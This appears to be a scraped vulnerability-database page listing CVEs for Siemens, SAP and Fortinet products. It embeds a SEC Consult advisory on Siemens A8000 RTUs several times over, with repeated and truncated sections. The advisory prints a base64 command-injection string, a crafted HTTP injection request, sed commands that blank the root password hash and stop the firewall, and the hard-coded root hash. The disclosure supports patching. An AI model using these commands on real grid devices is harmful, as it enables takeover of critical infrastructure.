VARIoT IoT vulnerabilities database

SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability

A vulnerability has been identified in JT2Go (All versions < V14.2.0.3), Teamcenter Visualization V13.2 (All versions < V13.2.0.13), Teamcenter Visualization V13.3 (All versions < V13.3.0.10), Teamcenter Visualization V14.0 (All versions < V14.0.0.6), Teamcenter Visualization V14.1 (All versions < V14.1.0.8), Teamcenter Visualization V14.2 (All versions < V14.2.0.3). The affected applications contain an out of bounds read past the end of an allocated buffer while parsing a specially crafted CGM file. This vulnerability could allow an attacker to disclose sensitive information. Siemens' JT2Go and Teamcenter Visualization Exists in an out-of-bounds read vulnerability.Information may be obtained

A vulnerability has been identified in JT2Go (All versions < V14.2.0.3), Teamcenter Visualization V13.2 (All versions < V13.2.0.13), Teamcenter Visualization V13.3 (All versions < V13.3.0.10), Teamcenter Visualization V14.0 (All versions < V14.0.0.6), Teamcenter Visualization V14.1 (All versions < V14.1.0.8), Teamcenter Visualization V14.2 (All versions < V14.2.0.3). The affected applications contain a memory corruption vulnerability while parsing specially crafted CGM files. This could allow an attacker to execute code in the context of the current process. Siemens' JT2Go and Teamcenter Visualization Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A vulnerability has been identified in SIMATIC WinCC (All versions < V7.5.2.13). Affected applications fail to set proper access rights for their installation folder if a non-default installation path was chosen during installation. This could allow an authenticated local attacker to inject arbitrary code and escalate privileges. SIMATIC WinCC is a supervisory control and data acquisition (SCADA) system

A vulnerability has been identified in SICAM P850 (7KG8500-0AA00-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA00-2AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA10-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA10-2AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA30-0AA0) (All versions < V3.11), SICAM P850 (7KG8500-0AA30-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA01-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA01-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA02-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA02-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA11-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA11-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA12-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA12-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA31-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA31-2AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA32-0AA0) (All versions < V3.11), SICAM P850 (7KG8501-0AA32-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA00-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA00-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA10-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA10-2AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA30-0AA0) (All versions < V3.11), SICAM P855 (7KG8550-0AA30-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA01-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA01-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA02-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA02-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA11-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA11-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA12-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA12-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA31-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA31-2AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA32-0AA0) (All versions < V3.11), SICAM P855 (7KG8551-0AA32-2AA0) (All versions < V3.11), SICAM T (All versions < V3.0). Affected devices are missing cookie protection flags when using the default settings. An attacker who gains access to a session token can use it to impersonate a legitimate application user. Siemens' q200 A firmware vulnerability related to improper assignment of permissions to critical resources.Information may be obtained and information may be tampered with. SICAM Q200 is a multifunctional device for detection, reporting and analysis of measured values ​​and events. A vulnerability has been identified in POWER METER SICAM Q200 family (All versions < V2.70)

An improper permissions, privileges, and access controls vulnerability [CWE-264] in FortiNAC-F 7.2.0, FortiNAC 9.4.1 and below, 9.2.6 and below, 9.1.8 and below, 8.8.0 all versions 8.7.0 all versions may allow an unauthenticated attacker to perform a DoS attack on the device via client-secure renegotiation. Fortinet FortiNAC is a network access control solution developed by Fortinet. This product is mainly used for network access control and IoT security protection. Fortinet FortiNAC has a security flaw that stems from improper permissions, privileges, and access control flaws

A vulnerability has been identified in SIMATIC PCS 7 (All versions < V9.1 SP2 UC04), SIMATIC S7-PM (All versions < V5.7 SP1 HF1), SIMATIC S7-PM (All versions < V5.7 SP2 HF1), SIMATIC STEP 7 V5 (All versions < V5.7). The affected product contains a database management system that could allow remote users with low privileges to use embedded functions of the database (local or in a network share) that have impact on the server. An attacker with network access to the server network could leverage these embedded functions to run code with elevated privileges in the database management system's server

SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.

An access control vulnerability [CWE-284] in FortiNAC version 9.4.2 and below, version 9.2.7 and below, 9.1 all versions, 8.8 all versions, 8.7 all versions, 8.6 all versions, 8.5 all versions may allow a remote attacker authenticated on the administrative interface to perform unauthorized jsp calls via crafted HTTP requests. Fortinet FortiNAC is a network access control solution developed by Fortinet. This product is mainly used for network access control and IoT security protection. Fortinet FortiNAC has a security flaw that stems from an access control flaw. The following versions are affected: versions 9.4.2 and earlier, versions 9.2.7 and earlier, all versions 9.1, all versions 8.8, all versions 8.7, all versions 8.6, and all versions 8.5

A vulnerability has been identified in JT2Go (All versions < V14.2.0.3), Teamcenter Visualization V13.2 (All versions < V13.2.0.13), Teamcenter Visualization V13.3 (All versions < V13.3.0.10), Teamcenter Visualization V14.0 (All versions < V14.0.0.6), Teamcenter Visualization V14.1 (All versions < V14.1.0.8), Teamcenter Visualization V14.2 (All versions < V14.2.0.3). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted CGM files. An attacker could leverage this vulnerability to crash the application causing denial of service condition. Siemens' JT2Go and Teamcenter Visualization for, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The web interface of affected devices is vulnerable to command injection due to missing server side input sanitation. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 > ======================================================================= title: Multiple Vulnerabilities including Unauthenticated RCE product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00) Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00) vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/) SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices. This works by setting malicious parameters and starting an Ethernet package capture. 3) Hard-coded Root Password (CVE-2023-33920) The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH. 4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1,2, and 3). Proof of concept: ----------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows: ;echo aWQ=| base64 -d | sh # The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND] Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY] A valid request can be seen below: ----------------------------------------------------------------------- [ POC request removed ] ----------------------------------------------------------------------- If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user: ----------------------------------------------------------------------- base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root) ----------------------------------------------------------------------- Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall: ----------------------------------------------------------------------- sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop ----------------------------------------------------------------------- After this, login via SSH as root is possible: ----------------------------------------------------------------------- ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~# ----------------------------------------------------------------------- 2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set: ----------------------------------------------------------------------- POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value> ping [IP] BBBBBBB</value> </parameter></view></Cmd_SetCustomViewValue> ----------------------------------------------------------------------- The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below: ----------------------------------------------------------------------- [...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...] ----------------------------------------------------------------------- The executed script creates a process running as root user, which can be seen by running "ps" on the device: ----------------------------------------------------------------------- root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP] ----------------------------------------------------------------------- 3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file: ----------------------------------------------------------------------- root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7::: ----------------------------------------------------------------------- 4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below: ----------------------------------------------------------------------- U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system ----------------------------------- Welcome to SICAM IES ----------------------------------- Welcome to _______. __ ______ ___ .___ ___. / || | / | / \ | \/ | | (----`| | | ,----' / ^ \ | \ / | \ \ | | | | / /_\ \ | |\/| | .----) | | | | `----./ _____ \ | | | | |_______/ |__| \______/__/ \__\ |__| |__| RTUs [...] sicam login: ----------------------------------------------------------------------- Additionally, a console login form is displayed. Login is possible if the password for the set "root" user password hash (see 3) is known. Vulnerable / tested versions: ----------------------------- The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92 Vendor contact timeline: ------------------------ 2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-04-11: Siemens releases advisory for unauthenticated RCE (Vulnerability 1, CVE-2023-28489) 2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4 (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921) 2023-06-21: Siemens has additional feedback regarding the contents of the advisory. 2023-07-03: Release of security advisory. Solution: --------- Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html Workaround: ----------- Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023

A vulnerability has been identified in JT2Go (All versions < V14.2.0.3), Teamcenter Visualization V13.2 (All versions < V13.2.0.13), Teamcenter Visualization V13.3 (All versions < V13.3.0.10), Teamcenter Visualization V14.0 (All versions < V14.0.0.6), Teamcenter Visualization V14.1 (All versions < V14.1.0.8), Teamcenter Visualization V14.2 (All versions < V14.2.0.3). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted CGM files. This could allow an attacker to execute code in the context of the current process. Siemens' JT2Go and Teamcenter Visualization Exists in an out-of-bounds read vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A vulnerability has been identified in SIMATIC NET PC Software V14 (All versions), SIMATIC NET PC Software V15 (All versions), SIMATIC PCS 7 V8.2 (All versions), SIMATIC PCS 7 V9.0 (All versions), SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC (All versions < V8.0), SINAUT Software ST7sc (All versions). Before SIMATIC WinCC V8, legacy OPC services (OPC DA (Data Access), OPC HDA (Historical Data Access), and OPC AE (Alarms & Events)) were used per default. These services were designed on top of the Windows ActiveX and DCOM mechanisms and do not implement state-of-the-art security mechanisms for authentication and encryption of contents. simatic net pc software , SIMATIC PCS 7 , SIMATIC WinCC Unspecified vulnerabilities exist in multiple Siemens products.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain an exposed UART console login interface. An attacker with direct physical access could try to bruteforce or crack the root password to login to the device. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. There is a security vulnerability in Siemens SICAM A8000 Devices CPCI85 Firmware. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 > ======================================================================= title: Multiple Vulnerabilities including Unauthenticated RCE product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00) Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00) vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/) SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices. 2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture. 3) Hard-coded Root Password (CVE-2023-33920) The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH. After connecting to the interface, boot information is given and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1,2, and 3). Proof of concept: ----------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows: ;echo aWQ=| base64 -d | sh # The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND] Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY] A valid request can be seen below: ----------------------------------------------------------------------- [ POC request removed ] ----------------------------------------------------------------------- If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user: ----------------------------------------------------------------------- base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root) ----------------------------------------------------------------------- Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall: ----------------------------------------------------------------------- sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop ----------------------------------------------------------------------- After this, login via SSH as root is possible: ----------------------------------------------------------------------- ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~# ----------------------------------------------------------------------- 2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set: ----------------------------------------------------------------------- POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value> ping [IP] BBBBBBB</value> </parameter></view></Cmd_SetCustomViewValue> ----------------------------------------------------------------------- The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below: ----------------------------------------------------------------------- [...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...] ----------------------------------------------------------------------- The executed script creates a process running as root user, which can be seen by running "ps" on the device: ----------------------------------------------------------------------- root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 \_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 \_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 \_ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 \_ ping [IP] ----------------------------------------------------------------------- 3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file: ----------------------------------------------------------------------- root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7::: ----------------------------------------------------------------------- 4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below: ----------------------------------------------------------------------- U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system ----------------------------------- Welcome to SICAM IES ----------------------------------- Welcome to _______. __ ______ ___ .___ ___. Vulnerable / tested versions: ----------------------------- The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92 Vendor contact timeline: ------------------------ 2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-07-03: Release of security advisory. Solution: --------- Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html Workaround: ----------- Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 > ======================================================================= title: Multiple Vulnerabilities including Unauthenticated RCE product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00) Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00) vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/) SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices. 2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH. 4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login 